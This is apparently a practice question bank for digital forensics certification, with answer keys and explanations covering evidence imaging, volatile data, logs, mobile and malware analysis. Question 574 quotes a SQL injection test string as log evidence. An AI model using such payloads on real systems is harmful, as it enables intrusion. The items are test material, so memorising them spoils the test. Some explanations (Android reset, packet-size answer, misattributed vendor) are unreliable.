During an investigation, a forensic analyst must preserve a hard drive that is part of a RAID array. Which of the following is the MOST appropriate method to preserve the evidence?

A.Power off the system and remove only the drive with the operating system
B.Disconnect all drives and image a logical volume after the RAID controller
C.Image each physical drive individually using a write blocker
D.Rebuild the array in a different system and then image
Answer: C

This preserves each drive's contents without modification, maintaining the ability to reconstruct the array.

Why this answer

Option C is correct because imaging each physical drive individually with a write blocker preserves the exact bit-for-bit state of every disk in the RAID array, including metadata, parity, and superblock information. This approach ensures that the logical volume can be reconstructed later in a controlled environment without altering the original evidence, which is critical for maintaining chain of custody and forensic integrity.

Exam trap

EC-Council often tests the misconception that imaging a logical volume or rebuilding the array is acceptable, but the trap here is that any operation that allows the RAID controller or OS to write to the drives (even during a read) can alter evidence, making individual physical imaging with a write blocker the only forensically sound method.

How to eliminate wrong answers

Option A is wrong because removing only the operating system drive from a RAID array destroys the array's configuration and may cause the controller to mark the remaining drives as degraded or foreign, potentially overwriting critical metadata. Option B is wrong because imaging a logical volume after the RAID controller introduces the risk of the controller altering data during read operations (e.g., on-the-fly parity recalculation or bad block remapping), and it does not capture the physical state of each drive, which may be needed for parity analysis or recovery of deleted data. Option D is wrong because rebuilding the array in a different system can trigger automatic synchronization or reconstruction processes that modify data on the drives, thereby contaminating the evidence and violating forensic best practices.

573
MCQ · hard

A forensic examiner is analyzing an Android device that has been factory reset. Which of the following artefacts is MOST likely to still be recoverable from the device's flash memory after a factory reset, assuming no overwrite has occurred?

A.The GUID Partition Table (GPT)
B.The device's encryption keys
C.The Android OS system files
D.User data such as photos and contacts
Answer: D

User data may be recoverable from unallocated space after a factory reset if not overwritten.

Why this answer

After a factory reset on an Android device, the operating system typically performs a 'fastboot format' or 'wipe data/factory reset' which only unmounts the userdata partition and marks its blocks as free in the ext4 or F2FS filesystem metadata. The actual user data (photos, contacts, etc.) remains physically stored in the NAND flash memory until those blocks are overwritten by new data. Because no overwrite has occurred in this scenario, the raw data is still recoverable using forensic tools that bypass the filesystem and read the flash memory directly.

Exam trap

EC-Council often tests the misconception that a factory reset securely erases all data, when in fact it only removes filesystem pointers, leaving the underlying data recoverable until overwritten.

How to eliminate wrong answers

Option A is wrong because the GUID Partition Table (GPT) is stored in the boot partition area (LBA 1–34) and is not erased or affected by a factory reset; it remains intact and is not a user-data artifact. Option B is wrong because encryption keys are stored in the device's dedicated hardware-backed keystore (e.g., Trusted Execution Environment or StrongBox) and are securely wiped or invalidated during a factory reset, making them unrecoverable. Option C is wrong because Android OS system files reside in the system partition, which is read-only and not modified by a factory reset; they are not user data and are not the target of recovery in this context.

574
MCQ · medium

A security analyst is reviewing Apache access logs and finds repeated requests to /index.php?id=1' OR '1'='1. Which type of attack is MOST likely being attempted?

A.Remote file inclusion
B.Path traversal
C.SQL injection
D.Cross-site scripting (XSS)
Answer: C

The payload 1' OR '1'='1 is a standard SQL injection test to manipulate queries.

Why this answer

The pattern 1' OR '1'='1 is a classic SQL injection payload attempting to bypass authentication or extract data. The single quote and OR condition are characteristic of SQLi.

575
Multi-Select · hard

Which TWO of the following are valid methods to collect logs from Docker containers for forensic analysis? (Select TWO)

Select 2 answers
A.Using docker logs command to retrieve container logs
B.Using docker inspect to get log configuration
C.Copying log files from the container using docker cp
D.Using docker exec to run syslog inside the container
E.Using docker image to view the image layers
Answers: A, C

docker logs fetches the container's console output.

Why this answer

The 'docker logs' command captures container stdout/stderr, and the 'docker cp' command can copy log files from the container filesystem. Other methods are not directly applicable.

576
Drag & Drop · medium

Drag and drop the steps to perform a forensic examination of a mobile device (Android) using Cellebrite UFED into the correct order.

Why this order

Mobile forensics requires enabling debugging, selecting extraction method, and parsing data.

577
MCQ · hard

During a forensic investigation, a first responder notices that a computer is running and suspects that volatile data may be present. According to best practices, what should the responder do to preserve the most volatile data first?

A.Perform a graceful shutdown to avoid data corruption
B.Remove the hard drive immediately while the system is running
C.Capture the contents of RAM using a forensic tool, then shut down
D.Immediately unplug the power cord to freeze the system state
Answer: C

This preserves the most volatile data first.

Why this answer

Option C is correct because volatile data, such as the contents of RAM, is lost when power is removed. The first responder must capture this data using a forensic tool (e.g., FTK Imager, WinPmem, or LiME) before performing a shutdown. This follows the Order of Volatility (RFC 3227), which prioritizes capturing registers, cache, and RAM before any persistent storage.

Exam trap

The trap here is that candidates often confuse 'preserving data integrity' with 'avoiding corruption' and choose a graceful shutdown (Option A), not realizing that the shutdown process itself destroys the most volatile evidence.

How to eliminate wrong answers

Option A is wrong because a graceful shutdown allows the operating system to overwrite or clear volatile data (e.g., memory pages, temporary files, and encryption keys) during the shutdown process, destroying potential evidence. Option B is wrong because removing the hard drive while the system is running can cause electrical damage to the drive and controller, and it does not preserve RAM; the volatile data in memory is lost immediately when power is interrupted. Option D is wrong because immediately unplugging the power cord causes an abrupt loss of power, which destroys all volatile data in RAM and cache, and may also cause filesystem corruption on the hard drive due to incomplete write operations.

578
MCQ · hard

During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?

A.They are both plain-text log files used for system monitoring
B.The diagnostics directory contains binary log data from the unified logging system
C.The diagnostics directory contains compressed archives of system.log
D.These locations are remnants of third-party security software
Answer: B

macOS unified logging stores binary logs in diagnostics, providing detailed forensic data.

Why this answer

The unified logging system in macOS stores log data in /private/var/db/diagnostics/ in a binary format, while /var/log/system.log is a legacy plain-text log. The diagnostics directory contains more detailed logs for forensic analysis.

579
MCQ · medium

Which of the following is a significant challenge in cloud forensics compared to traditional digital forensics?

A.Inability to collect memory dumps
B.Multi-tenancy and data segregation
C.Lack of logging
D.Data volatility
Answer: B

Cloud environments share resources among multiple tenants, complicating evidence isolation.

Why this answer

Multi-tenancy in cloud environments means that evidence from one tenant may be co-mingled with data from other tenants, and isolation can be difficult.

580
MCQ · hard

A forensic analyst is investigating a MySQL database server breach. Which log is MOST useful for identifying a series of queries that exfiltrated data, assuming the attacker used a compromised application account?

A.General query log
B.Binary log
C.Slow query log
D.Error log
Answer: A

Logs every query, so exfiltration queries would be visible.

Why this answer

The MySQL general query log records every statement the server receives, so it is the best place to see all queries issued by a compromised application account, although enabling it is resource-intensive. The binary log records only data changes, the error log contains server errors, and the slow query log records only queries that exceed the configured slow-query threshold.

581
Multi-Select · hard

A security analyst is analyzing network traffic and sees the following: Source IP 10.0.0.1, Destination IP 203.0.113.5, TCP SYN flag set, destination port 445. The analyst suspects a worm propagation attempt. Which TWO additional pieces of evidence would strengthen this conclusion?

Select 2 answers
A.The packet size is exactly 66 bytes, identical to other similar packets
B.Multiple similar SYN packets from 10.0.0.1 to many internal IPs on port 445
C.The source MAC address is from a well-known vendor
D.The packet contains a payload with the string "SMBv2"
E.The destination IP 203.0.113.5 is a known web server
Answers: A, B

Uniform packet sizes often indicate automated scanning tools versus legitimate traffic.

Why this answer

Worm propagation often scans many internal hosts on SMB port 445 (indicating lateral movement) and uses consistent payload sizes. A single SYN to an external IP on port 445 could be a normal file share connection. Internal scanning and similar packet sizes are indicative of automated worm behavior.

582
MCQ · hard

A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?

A.http.request
B.ip.proto == 6
C.tcp.port == 80
D.http
Answer: D

Wireshark's display filter 'http' captures all packets that contain HTTP protocol data.

Why this answer

The correct filter for HTTP traffic in Wireshark is 'http'. Wireshark uses protocol names in lowercase for display filters.

583
MCQ · medium

An email forensic analyst receives a suspicious email and wants to verify the originating IP address. The analyst extracts the email headers and sees multiple 'Received' fields. Which 'Received' header should the analyst consider as the most trustworthy source of the sender's IP?

A.The first 'Received' header at the top
B.The last 'Received' header at the bottom
C.The 'X-Originating-IP' header
D.The 'Return-Path' header
Answer: B

The bottom Received header is the closest to the sender's MTA, thus the most reliable for identifying the original source IP.

Why this answer

The lowest (last) 'Received' header in the email is the first hop from the sender's MTA, making it the most trustworthy for the originating IP.

584
MCQ · hard

A forensic investigator is analyzing a malware sample that appears to be packed. Using PEiD, the analyst detects an entropy value of 7.8 and the entry point section is named 'UPX0'. Which of the following tools should the analyst use NEXT to unpack the malware for static analysis?

A.UPX -d
B.Ghidra
C.Process Monitor
D.IDA Pro
Answer: A

The UPX tool with -d flag decompresses UPX-packed executables.

Why this answer

The presence of 'UPX0' as the entry point section name and an entropy value of 7.8 (very high, indicating compression or encryption) strongly suggests the malware is packed with UPX (Ultimate Packer for eXecutables). The correct next step is to use UPX with the -d (decompress) switch to unpack the binary, restoring the original executable for static analysis. This is a standard, reversible unpacking method that does not require dynamic analysis or disassembly of the packed stub.

Exam trap

EC-Council often tests the distinction between tools for unpacking versus tools for analysis, expecting candidates to recognize that UPX -d is the direct unpacking utility, while Ghidra and IDA Pro are analysis tools that require an already-unpacked binary for effective static analysis.

How to eliminate wrong answers

Option B (Ghidra) is wrong because Ghidra is a reverse-engineering framework for disassembly and decompilation, not a dedicated unpacking tool; attempting to analyze a packed binary in Ghidra without first unpacking it would yield obfuscated or compressed code, making static analysis ineffective. Option C (Process Monitor) is wrong because Process Monitor is a dynamic analysis tool for capturing real-time system activity (registry, file system, process/thread activity), not for unpacking or static analysis of a binary. Option D (IDA Pro) is wrong because IDA Pro is an interactive disassembler and debugger; while it can be used to analyze packed binaries with plugins, the immediate next step after detecting UPX packing is to use the UPX tool itself to decompress the file, as IDA Pro is not a dedicated unpacker and would still require unpacking first for effective static analysis.

585
MCQ · hard

An incident responder is analyzing a compromised web server and finds a file named 'cmd.aspx' in the uploads directory. The file contains ASP.NET code that accepts commands via the 'cmd' parameter and executes them on the server. Which of the following best describes this artifact?

A.A legitimate administrative tool for server management
B.A webshell allowing remote command execution
C.A backdoor installed via a SQL injection vulnerability
D.A malware dropper for deploying ransomware
Answer: B

The file accepts commands and executes them, classic webshell behavior.

Why this answer

A web shell is a script uploaded to a web server that allows remote command execution. The filename and behavior match a webshell.

586
MCQ · hard

During a forensic investigation, an analyst uses the following command: dd if=/dev/sda of=/mnt/evidence/image.dd bs=4096 conv=noerror,sync. What is the effect of the conv=noerror,sync option?

A.It verifies the integrity of the image using a hash algorithm
B.It ignores read errors and pads bad blocks with zeros in the output image
C.It creates a compressed image to save disk space
D.It enables logging of all I/O errors to a separate file
Answer: B

This is exactly what noerror (ignore errors) and sync (pad with zeros) do.

Why this answer

The `conv=noerror,sync` option in `dd` instructs the tool to continue processing even when a read error is encountered (`noerror`) and to pad the output block with zeros (`sync`) to maintain the correct block size and offset alignment. This ensures that the forensic image remains a bit-for-bit copy of the source device in terms of size and structure, with corrupted sectors replaced by zeros rather than causing the imaging process to abort or produce a truncated image.

Exam trap

Cisco often tests the misconception that `conv=noerror,sync` performs error correction or data recovery, when in fact it simply ignores errors and pads with zeros, which can lead to data loss if the analyst assumes the image is pristine.

How to eliminate wrong answers

Option A is wrong because `conv=noerror,sync` does not perform any hash verification; integrity is verified separately by hashing the source device and the resulting image with tools such as `md5sum` or `sha1sum` and comparing the digests. Option C is wrong because `dd` does not compress data; compression requires piping its output through `gzip` or another compression tool. Option D is wrong because `dd` has no built-in facility for logging I/O errors to a separate file; error logging must be done by redirecting stderr or using a wrapper script.

587
MCQ · easy

In the context of the US Fourth Amendment, what is typically required for law enforcement to seize a computer for forensic examination?

A.A subpoena duces tecum
B.No legal authorization is needed if the computer is in plain view
C.Consent of the owner, a warrant, or exigent circumstances
D.Only a warrant issued by a judge
Answer: C

These are common exceptions to the warrant requirement.

Why this answer

Option C is correct because the Fourth Amendment requires law enforcement to obtain a warrant based on probable cause, obtain the owner's consent, or demonstrate exigent circumstances before seizing a computer for forensic examination. This protects against unreasonable searches and seizures, and a computer's storage capacity means it can contain vast amounts of personal data, so the same constitutional protections apply as to a physical home or vehicle.

Exam trap

EC-Council often tests the misconception that a warrant is always required, ignoring that consent and exigent circumstances are equally valid legal bases for seizure without a warrant.

How to eliminate wrong answers

Option A is wrong because a subpoena duces tecum compels the production of documents or records, but it does not authorize law enforcement to physically seize a computer for forensic examination; it is a discovery tool, not a search warrant. Option B is wrong because the plain view doctrine only applies if the officer is lawfully present and the incriminating nature of the computer is immediately apparent, but it does not automatically permit seizing the device for a full forensic examination without a warrant or other exception. Option D is wrong because while a warrant is a common method, it is not the only method; consent and exigent circumstances are also valid exceptions under the Fourth Amendment.

588
MCQ · hard

During a malware analysis session, an analyst uses a tool to view the import address table (IAT) of a suspicious PE file. The tool shows imports from ws2_32.dll and wininet.dll. Which of the following tools would BEST allow the analyst to statically analyze the binary and view the IAT?

A.PEiD
B.Wireshark
C.Process Monitor
D.Cuckoo Sandbox
Answer: A

PEiD is a static analysis tool that can view imports, packers, and other PE header information.

Why this answer

PEiD (Portable Executable Identifier) is a static analysis tool that can parse the PE file structure, including the Import Address Table (IAT), to reveal which DLLs and functions are imported. Since the question specifies static analysis and viewing the IAT, PEiD is the best choice because it directly reads the PE headers without executing the file.

Exam trap

EC-Council often tests the distinction between static and dynamic analysis tools; the trap here is that candidates may confuse dynamic analysis tools (like Cuckoo Sandbox or Process Monitor) with static PE parsing tools, or mistake Wireshark for a binary analysis tool because it deals with network data.

How to eliminate wrong answers

Option B (Wireshark) is wrong because it is a network protocol analyzer that captures live traffic, not a static PE file analysis tool; it cannot parse the IAT of a binary. Option C (Process Monitor) is wrong because it is a dynamic monitoring tool that logs real-time system activity (registry, file system, process/thread) and does not perform static PE header analysis. Option D (Cuckoo Sandbox) is wrong because it is an automated dynamic malware analysis sandbox that executes the sample in an isolated environment, not a static analysis tool for viewing the IAT without execution.

589
MCQ · medium

Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?

A.Prefetch files
B.Jump Lists
C.MRU lists in the registry
D.LNK files
Answer: C

MRU lists are registry keys that store recently accessed files for applications like Notepad and WordPad.

Why this answer

MRU lists are stored in the registry under NTUSER.DAT (for example, in Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU). They track recently opened files.

590
MCQ · easy

A first responder arrives at a crime scene where a computer is powered on and displaying a desktop. According to best practices, which of the following actions should the responder take FIRST?

A.Press Ctrl+Alt+Del to check for active user sessions.
B.Connect a write blocker and begin imaging the hard drive.
C.Unplug the power cord immediately to preserve volatile data.
D.Photograph the scene and the computer screen.
Answer: D

Documenting the scene photographically is the first step to preserve evidence context.

Why this answer

The first responder should photograph the scene and all visible evidence before any actions that might alter the state. This preserves a visual record of the original condition.

591
Multi-Select · hard

A first responder arrives at a crime scene where a computer is running. Which THREE actions should the first responder take to preserve volatile evidence?

Select 3 answers
A.Collect contents of RAM using a tool like FTK Imager or dd
B.Unplug the power cord immediately
C.Record active network connections using netstat
D.Run a full antivirus scan on the system
E.Photograph the screen to capture current state
Answers: A, C, E

Memory contains volatile data critical for investigation.

Why this answer

Option A is correct because RAM contains volatile data that is lost when power is removed. FTK Imager or dd can capture the exact contents of memory, preserving running processes, open network connections, encryption keys, and other transient evidence critical to the investigation.

Exam trap

EC-Council often tests the misconception that immediately cutting power is the safest action, but the trap is that this destroys the most volatile evidence (RAM) and can corrupt the filesystem, whereas a proper forensic response prioritizes capturing memory first.

592
MCQ · medium

During a malware investigation, you find that a process named `svchost.exe` is making outbound connections to an IP address known to be malicious. What tool would be BEST to capture the network traffic for further analysis?

A.PEiD
B.Process Explorer
C.Regshot
D.Wireshark
Answer: D

Wireshark captures and analyzes network packets.

Why this answer

Wireshark is the best tool for capturing and analyzing network traffic because it can intercept packets at the network interface level, allowing you to inspect the full payload and headers of outbound connections from `svchost.exe` to the malicious IP. This enables deep analysis of protocols, data exfiltration attempts, and command-and-control communication patterns, which is essential in malware forensics.

Exam trap

EC-Council often tests the distinction between process analysis tools (like Process Explorer) and network analysis tools (like Wireshark), leading candidates to mistakenly choose Process Explorer because it can show network connections in its lower pane, but it cannot capture or inspect packet contents.

How to eliminate wrong answers

Option A is wrong because PEiD is a tool for detecting packers, cryptors, and compilers in executable files, not for capturing network traffic. Option B is wrong because Process Explorer is a process management and analysis tool that shows process details, handles, and DLLs, but it does not capture or analyze network packets. Option C is wrong because Regshot is a registry comparison tool used to detect changes made to the Windows registry, not for network traffic capture.

593
MCQ · hard

During an internal investigation, an employee is suspected of leaking sensitive data. The security team finds that the employee's computer has been turned off. Which of the following evidence types would be LOST due to the system being powered off?

A.System logs stored in the Event Viewer
B.Files stored on the hard drive
C.Registry hives
D.Contents of RAM and network connections
Answer: D

RAM and network state are volatile and lost on power loss.

Why this answer

Volatile data such as RAM contents, network connections, and running processes are lost when the system is powered off. Non-volatile data on the hard drive remains.

594
MCQ · easy

Which mobile forensics tool is specifically designed for physical extraction of iOS devices, including bypassing passcodes and extracting full file system images?

A.Oxygen Forensic Detective
B.Magnet AXIOM
C.Cellebrite UFED
D.GrayKey
Answer: D

GrayKey is a dedicated iOS forensic tool capable of physical extraction and passcode bypass.

Why this answer

GrayKey is a specialized forensic tool developed by GrayShift that performs physical extraction on iOS devices, including bypassing passcodes and obtaining full file system images. It exploits hardware and software vulnerabilities in iOS to extract data, making it the correct choice for this specific task.

Exam trap

The trap here is that candidates often confuse Cellebrite UFED's broad device support with the specific ability to perform physical extraction and passcode bypass on iOS, but Cellebrite's iOS capabilities are more limited compared to GrayKey's specialized focus.

How to eliminate wrong answers

Option A is wrong because Oxygen Forensic Detective is a comprehensive forensic platform that supports logical and file system extractions for iOS, but it does not specialize in physical extraction or passcode bypass for iOS devices. Option B is wrong because Magnet AXIOM is a digital forensic tool that focuses on artifact analysis and logical extractions, not physical extraction or passcode bypass for iOS. Option C is wrong because Cellebrite UFED supports physical extraction for many devices, but for iOS, it primarily relies on logical extraction or using the device's backup, and does not consistently bypass passcodes for full physical extraction like GrayKey does.

595
MCQ · hard

During a forensic examination of a solid-state drive (SSD), the analyst notices that the TRIM command was enabled. What challenge does this pose for data recovery?

A.It erases data blocks immediately after deletion, preventing recovery
B.It causes fragmentation, making file recovery more complex
C.It causes the drive to encrypt data automatically
D.It physically destroys the NAND cells, making the drive unusable
Answer: A

TRIM notifies the SSD controller to erase blocks, making deleted data unrecoverable.

Why this answer

TRIM tells the SSD controller which blocks no longer hold live data, so the controller can erase them immediately after deletion rather than waiting for a later overwrite. Once those blocks are erased, the data cannot be recovered with traditional file carving or undelete methods.

596
MCQ · medium

During an investigation, an analyst recovers deleted files from an NTFS volume. She notices that some files have data hidden in a stream that is not visible in regular directory listings. This stream is associated with a file but not stored in the $MFT. Which NTFS feature is being used to hide the data?

A.Journaling in NTFS
B.Alternate Data Streams (ADS)
C.Extended attributes in ext4
D.Volume shadow copy
Answer: B

ADS allow hiding data in NTFS streams.

Why this answer

Alternate Data Streams (ADS) allow data to be attached to a file as a separate stream, invisible in standard directory listings.

597
MCQ · hard

During a forensic investigation, an analyst needs to acquire the contents of a live server's RAM without altering the evidence. Which tool and technique should the analyst use to minimize the footprint on the system?

A.Install FTK Imager on the server and capture memory to a network share
B.Run a trusted version of win32dd.exe from a write-protected USB drive and capture memory to the USB
C.Use a remote acquisition tool over SSH to capture memory to a remote server
D.Use the built-in task manager to create a memory dump and save it locally
Answer: B

Running from a write-protected USB minimizes changes; capturing to USB avoids writing to the system drive.

Why this answer

Option B is correct because running a trusted version of win32dd.exe (now commonly part of the Belkasoft or DumpIt suite) from a write-protected USB drive ensures the tool binary is not modified by the compromised system and does not write any artifacts to the server's disk. Capturing memory directly to the USB drive minimizes the forensic footprint by avoiding writes to the server's local storage, preserving the integrity of the evidence.

Exam trap

EC-Council often tests the misconception that installing forensic tools on a live system is acceptable, but the trap here is that any installation or local write (even to a network share) alters the evidence, whereas a write-protected USB with a trusted binary avoids contamination.

How to eliminate wrong answers

Option A is wrong because installing FTK Imager on the live server writes installer files and registry keys to the system, altering the evidence and violating the principle of minimal footprint. Option C is wrong because using a remote acquisition tool over SSH requires installing or running an agent on the server, which modifies the system state, and network capture may introduce latency or packet loss, compromising the integrity of the memory dump. Option D is wrong because the built-in task manager's memory dump (e.g., 'Create dump file') writes a large file to the local disk, overwriting free space and potentially destroying volatile evidence, and the tool itself is part of the untrusted OS, which may be compromised.

598
MCQ · medium

A security analyst discovers a suspicious file on a Windows system with the hash 'd41d8cd98f00b204e9800998ecf8427e'. Which type of indicator of compromise (IoC) is this hash most commonly associated with?

A.Network indicator
B.Behavioural indicator
C.Registry key indicator
D.File hash indicator
Answer: D

File hashes (MD5, SHA1, SHA256) are used to uniquely identify known malicious files.

Why this answer

The hash 'd41d8cd98f00b204e9800998ecf8427e' is the MD5 hash of an empty file (zero bytes). In malware forensics, a file hash is a classic file-based indicator of compromise (IoC) used to uniquely identify known malicious files. Option D is correct because this hash directly identifies a specific file, making it a file hash indicator.

Exam trap

EC-Council often tests candidates' ability to distinguish between IoC types by presenting a well-known hash value, leading some to mistakenly classify it as a network or behavioural indicator due to its unusual appearance.

How to eliminate wrong answers

Option A is wrong because a network indicator refers to IP addresses, domain names, or URLs observed in network traffic, not a cryptographic hash of a file. Option B is wrong because a behavioural indicator describes actions or patterns of behaviour (e.g., process creation, registry modification) rather than a static file identifier. Option C is wrong because a registry key indicator involves Windows Registry paths or values, not a file hash.

599
MCQ · easy

Which of the following is the primary purpose of using a hardware write blocker during disk acquisition?

A.To decrypt the drive during acquisition
B.To prevent any writes to the original evidence drive
C.To compress the acquired image
D.To increase the speed of the acquisition
Answer: B

This ensures the integrity of the evidence.

Why this answer

A hardware write blocker is a device placed between the suspect drive and the forensic workstation that intercepts and blocks any write commands from the host operating system, ensuring that the original evidence drive remains unaltered. This is critical for maintaining the integrity of digital evidence, as any modification to the source drive could render it inadmissible in court. The primary purpose is therefore to prevent any writes to the original evidence drive, preserving its exact state for forensic analysis.

Exam trap

EC-Council often tests the misconception that a write blocker performs active functions like decryption or compression, when in reality it is a passive hardware filter that only enforces read-only access at the bus level.

How to eliminate wrong answers

Option A is wrong because a hardware write blocker does not perform decryption; decryption requires separate tools or keys and is not a function of write-blocking hardware. Option C is wrong because compression of the acquired image is handled by imaging software (e.g., FTK Imager, dd with gzip) after the write blocker has ensured read-only access, not by the write blocker itself. Option D is wrong because a write blocker does not increase acquisition speed; in fact, it may introduce a slight latency due to the hardware bridge, and speed is determined by the interface (e.g., SATA, USB) and the imaging tool, not the blocker.

600
Multi-Select · easy

Which TWO of the following are anti-forensic techniques used by malware to evade detection?

Select 2 answers
A.Packing
B.Logging errors
C.Timestomping
D.Encryption of communication
E.Creating mutexes
Answers: A, C

Packing compresses/obfuscates code to evade signature-based detection.

Why this answer

Packing is an anti-forensic technique that compresses or encrypts the malware's executable code, making static analysis difficult by obfuscating the original binary signature and strings. This allows malware to evade signature-based detection by antivirus and forensic tools until the packed code is unpacked at runtime.

Exam trap

Cisco often tests the distinction between anti-forensic techniques (which actively hide or destroy forensic evidence) and general security mechanisms (like encryption of communication) that do not directly target forensic artifacts.
